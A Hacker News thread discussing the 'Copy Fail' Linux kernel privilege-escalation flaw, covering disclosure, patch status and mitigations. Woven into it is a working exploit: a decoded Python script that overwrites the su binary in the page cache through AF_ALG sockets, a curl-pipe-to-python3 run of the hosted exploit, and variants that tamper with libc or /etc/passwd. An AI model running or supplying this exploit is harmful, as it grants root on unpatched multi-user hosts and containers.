We could easily get the byte count down further by using base64.b85decode instead of bytes.fromhex (-70 or so), but ultimately we're optimizing a meaningless metric, as you mention.

tptacek1mo ago

I don't get the 732-byte thing either and while I think it's a relatively punchy and unusually informative landing page for named vulnerability there are little snags like this all over it.

tylerni71mo ago

But the bug is real and people should patch :)

debo_1mo ago

Where do you see this "fetishizing" happening most often? It's a strange thing to counter-fetishize about.

layer81mo ago

> I think of it as a proxy measure for how complicated or uncomplicated the exploit might be.

From a Busy Beaver, 256-bytes compo, or Dwitter perspective, 732 bytes isn’t really that meaningful.

And the sample exploit is even optimizing the byte size by using zlib compression, which doesn’t make much sense for the purpose. It just emphasizes the byte count fetishization.

refulgentis1mo ago

It's just lazy AI* writing w/0 editing.

"Just" is doing a lot of work there, I'm so annoyed reading it.

It's like an anti-ad and they had pretty cool material to work with.

* Claude loves stacatto "Some numeric figure. Something else. Intensifier" (ex. the "exploitable for a decade." or whatever sentences)

bonzini1mo ago

Completely without editing, to the point of hallucinating a RHEL version (14.3) that doesn't exist.

tjbecker1mo ago

I recommend reading the technical writeup https://xint.io/blog/copy-fail-linux-distributions

https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe...

xmcp1231mo ago

Glad I’m not alone. The whiplash from “oh, python I can read this” to “what the hell does that do” was jarring.

Assuming AI was correct, it unpacks more or less like this

import os, zlib, socket

AF_ALG = 38

SOCK_SEQPACKET = 5

SOL_ALG = 279

def hex_bytes(x):

    return bytes.fromhex(x)

def trigger(fd, offset, patch4):

    sock = socket.socket(AF_ALG, SOCK_SEQPACKET, 0)

    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

    sock.setsockopt(SOL_ALG, 1, hex_bytes("0800010000000010" + "0" * 64))

    sock.setsockopt(SOL_ALG, 5, None, 4)

    op, _ = sock.accept()

    length = offset + 4

    zero = b"\x00"

    op.sendmsg(

        [b"A" * 4 + patch4],

        [

            (SOL_ALG, 3, zero * 4),

            (SOL_ALG, 2, b"\x10" + zero * 19),

            (SOL_ALG, 4, b"\x08" + zero * 3),

        ],

        32768,

    )

    read_pipe, write_pipe = os.pipe()

    os.splice(fd, write_pipe, length, offset_src=0)

    os.splice(read_pipe, op.fileno(), length)

    try:

        op.recv(8 + offset)

    except:

        pass

target = os.open("/usr/bin/su", os.O_RDONLY)

payload = zlib.decompress(bytes.fromhex("..."))

offset = 0

while offset < len(payload):

    trigger(target, offset, payload[offset:offset + 4])

    offset += 4

os.system("su")

embedding-shape1mo ago

> I would absolutely never approve review of any code that used this.

How often do you review, and subsequently block the release, of PoCs in this sort of context? Sounds like you've faced this a lot.

I always thought code quality mattered less in those, as long as you communicate the intent.

Xirdus1mo ago

If you have a choice between posting minimized exploit code, and posting regular exploit code, posting minimized code is virtually always the wrong choice.

If you have a choice between pointing out the byte size of the exploit, and not pointing out the byte size of the exploit, pointing it out is virtually always the wrong choice.

In both cases, doing the right thing is less work. So somebody is going the extra way to ensure they are doing it wrong. If they didn't care, they'd end up doing it right by default.

nvme0n1p11mo ago

> as long as you communicate the intent

It would have been less work for everyone involved to just release the unminified source.

opello1mo ago

tensegrist1mo ago

llms love that though

"The honest solution: a clean 50-line cut" and so on, ad nauseam

rts_cts1mo ago

infogulch1mo ago

While I agree that it doesn't make much sense to use a minimizer on code the reader could understand, the code-golfed byte count of a CVE repro communicates its complexity in a certain visceral way.

flourflour1mo ago

fragmede1mo ago

> Anyway, I could go on.

edit: If we drop offset_src=0 and just pass in 0 positionally, it comes down to 720.

Banditoz1mo ago

>...why shouldn't we enjoy how small you can get it to pop a root shell?

Because I want to know what the exploit is doing and how it works, and if it's even safe to run.

A privesc PoC is NOT the place for this kind of fun.

ok1234561mo ago

This is pretty legible compared to the 90s C rootshell.org exploits.

john_strinlai1mo ago

>As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.

lucky for them, its an exploit script, not enterprise code.

all that needs to be "reviewed" is whether or not it exploits the thing its supposed to.

edit: yall really think a 10-line proof of concept script needs to undergo a code review? wild. i shouldnt be surprised that the top comment on a cool LPE exploit is complaining about variable naming

StableAlkyne1mo ago

Maybe you didn't care, but the length of this comment chain clearly shows that it matters. Effective communication is just as important as the engineering.

Xirdus1mo ago

I'd imagine that at minimum, the team in charge of patching the vulnerability would need to review how the exploit works.

progval1mo ago· 17 in thread

I ran the exploit in rootless Podman, and predictably it doesn't escape the container.

They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine

john_strinlai1mo ago

>The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container

they state that the write-up is forthcoming. presumably there is some additional steps or modifications that will be detailed in the 'part 2'.

"Next: "From Pod to Host," how Copy Fail escapes every major cloud Kubernetes platform."

tjbecker1mo ago

This is correct. The container escape exploit and writeup is not yet released.

Twirrim1mo ago

> They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine

They've done themselves no favours at all with their write up.

x41321mo ago

i mean, it doesn't work on any SELinux, but it's still quite severe anyhow

layer81mo ago

The 2017 claim is based on the vulnerability having been introduced in this commit in the second half of 2017: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...

The details will depend on whether the kernel is a newer release or a maintenance version of an older release.

tardedmeme1mo ago

It overwrites bytes in memory of any file you can read. It's not hard to imagine how it could escape a lot of things.

rcxdude1mo ago

CGamesPlay1mo ago

https://security-tracker.debian.org/tracker/CVE-2026-31431

amusingimpala751mo ago

Their PoC does as you say, but is built upon arbitrary modification of the page cache, which could be abused for the other things

progval1mo ago

Ah indeed, it can be used to overwrite the page cache for files on read-only volumes.

CGamesPlay1mo ago

embedding-shape1mo ago

Did you try it on systems that don't have the patch already? Seems many distributions already shipped kernels with the patch ~a month ago.

progval1mo ago

microtherion1mo ago

It also doesn't work on Raspberry Pi, though presumably it could easily be made to; it does replace the su binary, but the replacement is not executable.

unsnap_bicepsOP1mo ago

It's patching the binary in memory, so the binary patch would be architecture dependent. The existing one is only x86_64, but with an updated payload, it would work on arm.

x41321mo ago

this is because the `su` binary is replaced with x86 shellcode, replace it with aarch64 and it will work just the same.

x41321mo ago

there is a PoC floating around for Alpine.

xeeeeeeeeeeenu1mo ago· 15 in thread

It seems there was some kind of confusion during the disclosure process, because the vendors aren't treating this vulnerability as serious and it remains unpatched in many distros.

https://access.redhat.com/security/cve/cve-2026-31431 "Moderate severity", "Fix deferred"

https://www.suse.com/security/cve/CVE-2026-31431.html

MarleTangible1mo ago

https://ubuntu.com/security/cves/about#priority

> Medium: A significant problem, typically exploitable for many users. Includes network daemon denial of service, cross-site scripting, and gaining user privileges.

oskarkk1mo ago

Strange that it's not classified as "high", which specifically includes "local root privilege escalations".

markhahn1mo ago

if your model is that linux is just about single-user desktops, this local exploit isn't too bad. or if your model is nothing but DB servers or the like.

daveoc641mo ago

Ubuntu seems to have updated the page to say that it's a high priority now.

mghackerlady1mo ago

it's not like this couldn't be chained with some other exploit to get remote access to get remote root access which seems like a bit of an issue

staticassertion1mo ago

still_grokking1mo ago

Will this continue like that even when the prophesied Mythos Vulnocalypse hits the Kernel?

This stance doesn't seem sustainable any more to me.

stefanor1mo ago

As far as we can tell, nobody disclosed it to the distributions, only to the kernel security team (who did not reach out to distributions). So the distributions are all scrambling now.

Good lesson in how not to do disclosure.

wangman1mo ago

RedHat has also changed it to "Important severity" and "Affected" now.

DooMMasteR1mo ago

Yeah, it was also staged for release on the affected kernel branches a while ago, but almost all still had the window open and only tonight got the merged across all maintained kernel versions.

It's not good... and surely not "responsible/planned" disclosure.

AntiUSAbah1mo ago

I'm schocked that ubuntu is aware of this and the prv lts is not patched yet :|

wtf

Tuna-Fish1mo ago

Yeah, by ubuntu's own guidelines linked on that page, this should be priority: high, but instead it's marked as medium.

no-name-here1mo ago

That was fixed, it’s now marked high.

Neil441mo ago

I thought that. surely people are going crazy right now owning anything with an our of date Wordpress exposed.

baggy_trough1mo ago

The upstream stable kernels (6.12.85, etc.) are out now with the fixes.

Lorin1mo ago· 10 in thread

What is the rationale behind naming CVEs and individual domains? Marketing?

diath1mo ago

It's an advertisement for their tool that found the exploit: https://copy.fail/#contact, https://xint.io/products/xint-code

john_strinlai1mo ago

can you remember what CVE-2021-44228 is without looking it up? CVE-2014-6271? CVE-2017-5753?

i bet if i told you their names, you would instantly know what vulns those are.

its easier to talk about things with names. it hurts no one. it takes approximately no effort or time.

CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.

QuantumNomad_1mo ago

> CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.

What, you guys talk about books based on their “title” instead of just memorising the ISBN of each book? Pssh, count me disappointed!

[1] https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb0...

tptacek1mo ago

It's certainly marketing, but it's prosocial: there's no scarcity of names, and "copy.fail" is much easier to remember and talk about than "CVE-2026-31431".

evanjrowley1mo ago

The AI generated prose screams marketing. Marketing is why there's a "Contact our Security Team" form at the bottom of the page.

skilled1mo ago

Very few CVE’s get names dedicated to them like this, because usually when they do - it is very serious, as in this case.

eddythompson801mo ago

dgellow1mo ago

Yes, originally it was to help spread awareness. Now it has become more of a gimmick I would say

ronsor1mo ago

It makes sure people don't forget about the vulnerabilities, at least

Fuzzbit1mo ago

Same reason they name storms, numbers scare normies

rany_1mo ago· 9 in thread

Could this be used to root Android devices? Does Android ship with algif_aead?

alufers1mo ago

I rewrote it quickly to C [1] (and changed the embedded binary to be aarch64).

Unfortunately it fails on calling bind() on my device, so probalby Android doesn't ship with that kenrel module by default :(. So no freedom for my $40 phone.

Putting it out here, maybe somebody else will have better luck.

alufers1mo ago

Update: Checking the kernel config indeed confirms this.

   adb shell zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
   # CONFIG_CRYPTO_USER_API_HASH is not set
   # CONFIG_CRYPTO_USER_API_SKCIPHER is not set
   # CONFIG_CRYPTO_USER_API_RNG is not set
   # CONFIG_CRYPTO_USER_API_AEAD is not set

notpushkin1mo ago

I’ve poked around on my phone and it didn’t work:

    File "/data/data/com.termux/files/home/a.py", line 5, in c
      a=s.socket(38,5,0); # ...
    File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__
      _socket.socket.__init__(self, family, type, proto, fileno)
      ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  PermissionError: [Errno 13] Permission denied

int0x291mo ago

I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.

tripdout1mo ago

There’s SELinux, everything is mounted nosuid, barely anything runs as root except init. I doubt it.

angry_octet1mo ago

You don't need a suit binary for this, they have arbitrary write of memory. The suid binary is just a convenient and portable way to demonstrate it. Real exploits will use many different mechanisms.

zb31mo ago

Android is smarter than setuid + system partitions aren't writable.

firer1mo ago

System partitions being non-writable has nothing to do with the vulnerability - it allows modifying the cache of any file that you can open for reading.

Not using setuid anywhere means you'd have to build a slightly more clever exploit, but it's still trivial - just modify some binary you know will run as root "soon".

int0x291mo ago

Its not writing to the partition though is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.

jesse_dot_id1mo ago· 7 in thread

Good thing nobody is silly enough to let fully autonomous AI agents run as regular users on these affected operating systems. That could be disastrous given a zero day prompt injection technique.

chromacity1mo ago

I don't see what the issue is, my agent is already running as root.

dnnddidiej1mo ago

Yeah it has all the government logins and full gmail access. It will be too busy to bother rooting the local machine!

ryandrake1mo ago

Good thing we haven't normalized installing things with curl | sh

still_grokking1mo ago

Yeah, that's great!

Imagine we would download random code from the internet and just execute it, like with NPM, PIP, Maven, Cargo etc.

https://docs.oracle.com/en/database/oracle/tuxedo/22/otxig/s...

dawnerd1mo ago

Or npm being allowed to run arbitrary post install scripts

Semaphor1mo ago

I don’t think that matters as it’s usually curl | sudo sh

FlyThruTheSun1mo ago

I literally ship an installer that runs with curl | bash... reading this thread while patching my servers is a fun experience lol

jzb1mo ago· 6 in thread

This is amazing. Page says it works on RHEL 14.3, which doesn’t exist. Current RHEL is 10.x, this must’ve been done in a TARDIS.

oskarkk1mo ago

14.3 seems to come from some Red Hat-specific GCC version, which can be reported as "gcc (GCC) 14.3.1 20250617 (Red Hat 14.3.1-2)". See these random examples I found by googling:

https://github.com/anthropics/claude-code/issues/40741 (gcc version "Red Hat 14.3" included in system version at the bottom)

bryanlarsen1mo ago

tylerni71mo ago

ugh sorry should be fixed. There was some scrambling to get more info together to explain the issue (and yes, obviously marketing), so there are some minor mistakes. Thanks for pointing it out!

justinclift1mo ago

> obviously marketing

Why marketing though?

https://x.com/i/status/2049687923814281351

cozzyd1mo ago

yeah, I assumed the whole thing was AI slop when I saw EL14...

tjbecker1mo ago

> and yes, RHEL 14.3 doesn't exist We meant to say RHEL 10.1. Sorry for the confusion!

hackernudes1mo ago· 5 in thread

LPE = local privilege escalation

Too many darn acronyms. This one wasn't too hard to figure out from context but I wish people would define acronyms before using them!

arcfour1mo ago

LPE is a very well-known acronym within the security community, it's not purely academic or obscure or anything.

Then again, the whole writeup appears to be AI-generated, so...

https://en.wikipedia.org/wiki/LPE

ButlerianJihad1mo ago

To be fair, I just consulted 3 cybersecurity glossaries (SANS.org, NIST CSRC, Huntress), and none of them list "LPE" nor "Local Privilege Escalation".

If you type "LPE" into English Wikipedia's search bar, and press "Enter", you'll be sent to a disambiguation page which contains a link to the relevant article.

jjordan1mo ago

Good writing for a broad audience requires it. Unfortunately the LLMs don't tend to adopt this guideline.

boston_clone1mo ago

it’s a CVE write up; the audience for these knows what an LPE is.

1970-01-011mo ago

I don't know why, but newer writers have never been taught to expand their acronyms on first use. I blame the US education system.

phreack1mo ago· 5 in thread

2001zhaozhao1mo ago

angry_octet1mo ago

These guys don't need to advertise, they are already 100% busy with work. But who wastes their time manually creating web pages? Especially kernel devs.

tkgally1mo ago

x41321mo ago

it's advertising their AI, not the talents of their humans :D

https://github.com/torvalds/linux/commit/a664bf3d603d

AntiUSAbah1mo ago

With vibe coding, html is a visualiation tool. not sure if i get your problem with that?

embedding-shape1mo ago· 5 in thread

For mitigation, the page currently basically just says:

> Update your distribution's kernel package to one that includes mainline commit a664bf3d603d

nh21mo ago

On a git repo that has as remotes

    https://github.com/torvalds/linux.git
    https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git as remotes:

running a search for commit a664bf3d603d's commit message:

    git log --all --grep 'crypto: algif_aead - Revert to operating out-of-place' '--format=%H' | xargs -I '{}' git tag --contains '{}' | sort -u

outputs these tags as having the fix:

    v6.18.22
    v6.18.23
    v6.18.24
    v6.18.25
    v6.19.12
    v6.19.13
    v6.19.14
    v7.0
    v7.0.1
    v7.0.2
    v7.0-rc7
    v7.1-rc1

bombcar1mo ago

Here's the diff if you wanna play in your source (Gentoo, looking at you):

6.18.25-gentoo-x86_64 has the patch for Gentoo.

https://security-tracker.debian.org/tracker/CVE-2026-31431

rcxdude1mo ago

kro1mo ago

Major os vendors will publish pages with the fixed versions:

Also, disabling algif_aead is suggested as mitigation

1p09gj20g8h1mo ago

Where are you seeing the disabling algif_aead mitigation?

https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464d...

m3nu1mo ago· 4 in thread

I wasn't able to unload algif_aead on RHEL 9/10 because it's built in, rather than a module.

So here the next-best thing I found: Disable AF_ALG via systemd. Needs drop-ins for all exposed services. Here an Ansible playbook that covers ssdh and user@, which are the main ones usually.

byron32561mo ago

How about blacklisting algif_aead initialization function on RHEL 9/10? I added "initcall_blacklist=algif_aead_init" to the kernel boot options and rebooted. The exploit is not working anymore.

https://www.freedesktop.org/software/systemd/man/latest/syst...

pkoiralap1mo ago

chucky_z1mo ago

`/etc/systemd/system/service.d/${...}.conf`

I think this is what you're looking for.

yrro1mo ago

not_your_vase1mo ago· 4 in thread

Is there a readable version of the exploit readily available by any chance? Gotta admit that I failed binary-zip-interpretation-with-naked-eye class twice

progval1mo ago

The binary "zip" isn't the exploit, it's the shellcode. The exploit is the rest, which changes the code of a SUID executable (su).

tommy_axle1mo ago

Go version came in handy https://github.com/badsectorlabs/copyfail-go especially for systems without the very latest python (os.slice)

Slightly more readable Python version at https://gist.github.com/grenkoca/b82281a4706e936072979acf54b...

stackghost1mo ago

The call to zlib basically overwrites a minimal ELF into a portion of the `su` binary, which exceve's /bin/sh.

tgies1mo ago

I have a C translation here that should be pretty readable https://github.com/tgies/copy-fail-c

rkeene21mo ago· 4 in thread

Interestingly it fails for me because my `su` isn't world-readable:

  $ stat /bin/su
    File: /bin/su
    Size: 59552           Blocks: 118        IO Block: 59904  regular file
  Device: 0,52    Inode: 796854      Links: 1
  Access: (4711/-rws--x--x)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2023-09-18 13:23:03.117105665 -0500
  Modify: 2021-02-13 05:15:56.000000000 -0600
  Change: 2023-09-18 13:23:03.119105665 -0500
   Birth: 2023-09-18 13:23:03.117105665 -0500

I'm not sure I have any setuid/setgid binaries that are world-readable...

rkeene21mo ago

A workaround might be to make all setuid/setgid files non-world-readable because then they cannot be opened at all, and thus there is no setuid file to replace the contents of.

hashstring1mo ago

Eh, if you can pollute page caches this won’t safe you.

Think modifying shared libraries, ld preload, cron, I guess on some systems /etc/passwd even.

There are a lot of files readable that should definitely not be writable.

zerocrates1mo ago

rkeene21mo ago

My `sudo` is also not readable. Files/directories don't need to be readable to be executed. I can still use `su` and `sudo`.

giis1mo ago· 4 in thread

As soon as I read this

>Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel. any user becomes root

jumped out of bed and went straight into webminal.org servers as local user and ran the python code. It says permission denied on sock() call.

Then I tested with local laptop with it:

```

$ uname -a

Linux debian 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64 GNU/Linux

$ python3 copy_fail_exp.py

# cd /root && ls

bluetooth_fix_log.txt dead.letter overcommit_memorx~ overcommit_memory~ overcommit_memorz~ resize.txt snap

```

It does provide the root access!

a961mo ago

Beware that running this kind of thing even as a test on a host you don't own may well be a criminal offense!

m-ueberall1mo ago

tommy_axle1mo ago

Could be worse (we'll see) as this could be a wild ride along with react2shell or some of the compromised packages as of late.

Joe_Cool1mo ago

Anyone tried in an Azure Cloud Shell?

Asking for a friend ;)

EDIT: Don't. "/s" in case not obvious.

maxtaco1mo ago· 4 in thread

Use extreme caution running arbitrary code on your machines, especially obfuscated code that tickles kernel bugs! (edited)

stackghost1mo ago

Analysis of the POC concurs with my tests that confirm that the portion of `su` that gets overwritten does not survive a reboot.

wang_li1mo ago

it's living in your page cache, not on your disk. flush the caches and it'll disappear.

charcircuit1mo ago

The page explicitly describes that it is stealthy as it does not make permanent changes, only corrupting the binary in memory.

scratchyone1mo ago

unfortunately the page can also lie to you haha. it seems people have reviewed the code by now, but running suspicious shellcode you don't fully understand is never a great idea.

https://openwall.com/lists/oss-security/2026/04/30/12

arcfour1mo ago· 3 in thread

It's unfortunate that this does not include which versions of the kernel are vulnerable/patched, especially since this is a builtin module which cannot be easily removed with rmmod...

  ...fixed in 6.18.22 with commit fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8

  ...fixed in 6.19.12 with commit ce42ee423e58dffa5ec03524054c9d8bfd4f6237

  ...fixed in 7.0 with commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5

Hope that helps.

hnarn1mo ago

most distros backport fixes which does not increment that version number. i.e. they patch it, they do not ship a completely new kernel release.

baggy_trough1mo ago

Greg KH says more backports coming soon.

noisy_boy1mo ago

Thanks for this - I was wondering why I got the password prompt on my Fedora 43 with latest packages.

corvad1mo ago· 3 in thread

If this is verified, this is a very big deal. Root access on any shared computer. Additionally do we know what kernel versions and stable versions have the patch?

Tuna-Fish1mo ago

I just tested on my home server running ubuntu 24.04 LTS with newest kernel from repositories, got root.

Avamander1mo ago

Can Livepatch mitigate this or is it already? I don't know where to look this up.

https://docs.python.org/3/library/os.html#os.splice

ranger_danger1mo ago

As far as mainline goes, only 7.0 and up have the patch already.

archon8101mo ago· 3 in thread

    curl https://copy.fail/exp | python3 && su
    Traceback (most recent call last):
      File "<stdin>", line 9, in <module>
      File "<stdin>", line 5, in c
    AttributeError: module 'os' has no attribute 'splice'

Does this mean I'm not affected or it's a buggy script?

Edit: python3 is python 3.6 on my system. Runnung with python3.10 instantly roots. Crazy find!

z3n1th1mo ago

It is trivial to re-write splice, just because the PoC uses it does not mean you're "not affected".

orlp1mo ago

What is your Python version? Splice was added in 3.10.

nnnniiiiiiggg1mo ago

do yourself a favor just pwn your laptop now with a sledgehammer and switch to an ipad or one of those big number phones for the elderly

Ekaros1mo ago· 3 in thread

So this could be usable in lot of places with Python and Linux running? Not that I have too many Linux devices around. Still, might be handy sometimes on personal devices.

kro1mo ago

This can likely be shipped as binary code without dependencies like python, as the bug is in the kernel.

ranger_danger1mo ago

C version here: https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb0...

SteveNuts1mo ago

There's nothing specific about this related to Python, that's just demonstrating how it works.

This is usable anywhere on an affected Kernel version

TehCorwiz1mo ago· 3 in thread

It does not behave as described on EndeavorOS (arch-based) running kernel 6.19.14-arch1-1. I receive the error:

Password: su: Authentication token manipulation error

I'm guessing this means it's already patched?

john_strinlai1mo ago

yes, it was reported on march 23rd, patches on april 1.

you are reading about it now because it has been patched.

marshray1mo ago

No it hasn't.

Ubuntu before 26.04 LTS (released a week ago) are currently listed as vulnerable.

Debian other than forky and sid are currently listed as vulnerable.

This is a disgrace.

dimastopel1mo ago

same result on my arch machine as well.

pixel_popping1mo ago· 3 in thread

collinmcnulty1mo ago

A human security researcher found the core issue and an agent searched for where to apply it. I don’t think “an agent found it in one hour” is a fair summary of what happened.

marshray1mo ago

So, if anything, this might argue against the presence of huge quantities of high-severity bugs in this part of the Linux kernel (that could be found by "Xint Code"-class scanning systems).

pixel_popping1mo ago

Anybody has the same feeling?

jeffwass1mo ago· 2 in thread

This submission is currently the main HN submission.

As of now the submission title is simply “Copy Fail”.

Given the severity of the exploit, can we edit the Title to add some context that it’s a major Linux vulnerability?

Eg the other submissions say this : “Copy Fail: 732 Bytes to Root on Every Major Linux Distribution.”

ramon1561mo ago

I dont really get why you'd

- buy a domain

- vibe code a page/artifact/whatever (which, given the quality of LLM wordings, only makes an argument less strong)

- post it on HN with no further explanation in the title

Why not write a detailed report? Even a tweet makes much more sense in my head than this. Even a logo??

Sorry if this comes over as salty, I guess I'm just not getting the thought process.

8 more replies

jcul1mo ago

Yes, strongly agree.

This is HUGE news, I would have skimmed over "Copy Fail".

The blog post might be a better place to link to also, it has more details on the exploit.

https://github.com/theori-io/copy-fail-CVE-2026-31431/issues

There are also some good threads on which distros are vulnerable and mitigations on the github page.

RandomGerm4n1mo ago· 2 in thread

dontdoxxme1mo ago

https://security-tracker.debian.org/tracker/CVE-2026-31431

strcat1mo ago

The vulnerability also isn't present in standard AOSP GKI kernels (including the stock Pixel OS) or GrapheneOS kernels since they use a minimal kernel with tons of functionality disabled.

skilled1mo ago· 2 in thread

This looks like an extraordinary find at first glance.

Does this mean you can go from a basic web shell from a shared hosting account to root? I can see how that could wreak havoc really quickly.

barbegal1mo ago

Yes I would imagine lots of those type of services would be vulnerable if they hadn't updated to the latest kernel versions.

stackghost1mo ago

As of this comment, Debian Stable ("Trixie", though I hate codenames) doesn't have a fix in place and remains vulnerable, or at least their CVE tracker shows it as such:

layer81mo ago· 2 in thread

Debian page: https://security-tracker.debian.org/tracker/CVE-2026-31431

Sohcahtoa821mo ago

layer81mo ago

What kernel version is it? (`uname -r`)

commandersaki1mo ago· 2 in thread

Tried this on my arch VPS which has a few users that hasn't been rebooted for 122 days.

Got:

    OSError: [Errno 97] Address family not supported by protocol

I guess AF_ALG is not part of the Arch Linux LTS kernel?

Edit:

Looks like on Arch you have to go out of your way to have this enabled.

    $ zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
    CONFIG_CRYPTO_USER_API=m
    CONFIG_CRYPTO_USER_API_HASH=m
    CONFIG_CRYPTO_USER_API_SKCIPHER=m
    CONFIG_CRYPTO_USER_API_RNG=m
    # CONFIG_CRYPTO_USER_API_RNG_CAVP is not set
    CONFIG_CRYPTO_USER_API_AEAD=m
    # CONFIG_CRYPTO_USER_API_ENABLE_OBSOLETE is not set
    $ uname -r
    6.12.63-1-lts

sltkr1mo ago

On my Arch boxes the official exploit works, both with the LTS kernel (6.18.21-1-lts) and the mainline release (6.19.6-arch1-1).

commandersaki1mo ago

parliament321mo ago· 2 in thread

Note that in kubernetes, setting `allowPrivilegeEscalation` to false (which you should be doing already, it's in the Pod Security Standards Restricted profile) mitigates this.

j16sdiz1mo ago

according to this reddit post https://www.reddit.com/r/kubernetes/comments/1szn6p1/comment...?

> the primary mitigation is still patching the node kernel; user namespaces are blast-radius reduction, not a complete mitigation for this path

TZubiri1mo ago

They have a setting for that?

That's crazy, feels like prompting "make no mistakes" to the llm.

If it works, when would you want it turned on? Why isn't false the default

fsflover1mo ago· 2 in thread

As usual, Qubes is not vulnerable, since by its design, any untrusted software runs in dedicated VMs with hardware virtualization.

Meanwhile, recent Xen CVEs also do not affect Qubes, as usual, https://www.qubes-os.org/news/2026/04/28/xsas-released-on-20...

handedness1mo ago

Why do you suppose Joanna Rutkowska made a point of calling Qubes OS "reasonably secure", rather than making claims like, "Qubes is not vulnerable" and "there is no attack vector"?

https://doc.qubes-os.org/en/latest/user/advanced-topics/mana...

kuhsaft1mo ago

You can check your DomU kernels using this guide:

If your Dom0 or DomU is running kernel < 6.18.22, or between 6.19.0 and 16.19.12 you are vulnerable.

https://github.com/QubesOS/qubes-linux-kernel/pull/1272 commit fafe0fa2995a of the kernel mirror

Currently stable version of QubeOS does not have the patched kernels. https://yum.qubes-os.org/r4.3/current/dom0/fc41/rpm/

charcircuit1mo ago· 2 in thread

SUID binaries once again assisted a local privilege escalation attack. This is a major problem that distros can't keep ignoring.

marshray1mo ago

There's a claim upthread that a straightforward variation works against /etc/passwd.

q3k1mo ago

You can also just use this to patch libc and turn close() into close-but-also-give-me-a-root-shell().

chasil1mo ago· 2 in thread

On the downside, I need to push new kernels to all my servers.

On this bright side, does this mean Magisk is coming to all unpatched Android phones?

akdev1l1mo ago

No, Android doesn’t have suid binaries to exploit like in the PoC

tardedmeme1mo ago

The vulnerability can also be used on any binary that is already running as root and you can open for reading. So yes, any android app can now escalate to root if android has the vulnerable module.

krunck1mo ago· 2 in thread

akdev1l1mo ago

You’d have to reinstall the su binary itself I guess

cyberpunk1mo ago

It just changes the page cache for the su binary, a reboot will revert it.

pkoiralap1mo ago· 2 in thread

Does anyone have a workaround for it? Edit: I don't understand why the comment would be downvoted.

angch1mo ago

I used, for debian based systems:

  printf "# CVE-2026-31431\nblacklist algif_aead\ninstall algif_aead /bin/false\n" | sudo tee /etc/modprobe.d/blacklist-algif_aead.conf >/dev/null && sudo update-initramfs -u

a961mo ago

There's some workarounds in https://copy.fail/#mitigation

nh21mo ago· 1 in thread

    python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind(("aead","authencesn(hmac(sha256),cbc(aes))")); print("algif_aead probably successfully loaded, mitigation not effective; remove again with: rmmod algif_aead")'

Similarly, when the mitigation is in place,

    modprobe algif_aead

should fail with an error.

archon8101mo ago

    modprobe algif_aead
    modprobe: FATAL: Module algif_aead not found in directory /lib/modules/6.14.3-x86_64-linode168

Yet this kernel is vulnerable.

https://object.ceph-waw3.hswaw.net/mastodon-prod/media_attac...

q3k1mo ago· 1 in thread

Quickly dove into this.

1. Yes, it's real.

2. Current chain can write any arbitrary content to any user-readable file (into the page cache).

3. Current chain relies on an available target suid binary that you can open() as a lowpriv user.

5. The authors say they have other chains (including ones that allow container escapes). I believe them.

q3k1mo ago

And yeah, you can just change arbitrary instructions of any running process (including privileged) as long as you have read access to that process' binary:

TZubiri1mo ago· 1 in thread

It looks like this is legit, but the script is very phishy and I wouldn't run it in unvirtualized or disposable systems.

https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...

This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)

That said, I understand why a terser script might have been prioritized.

EDIT: There's a couple of C ports in the comments that contain more details and no compressed payloads.

q3k1mo ago

> This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)

It doesn't, it's just a compressed ELF file that does setuid(0); execve(/bin/sh, 0, 0). You can just unzlib it and throw it in a disassembler.

tjbecker1mo ago· 1 in thread

For this crowd, I highly suggest checking out the technical writeup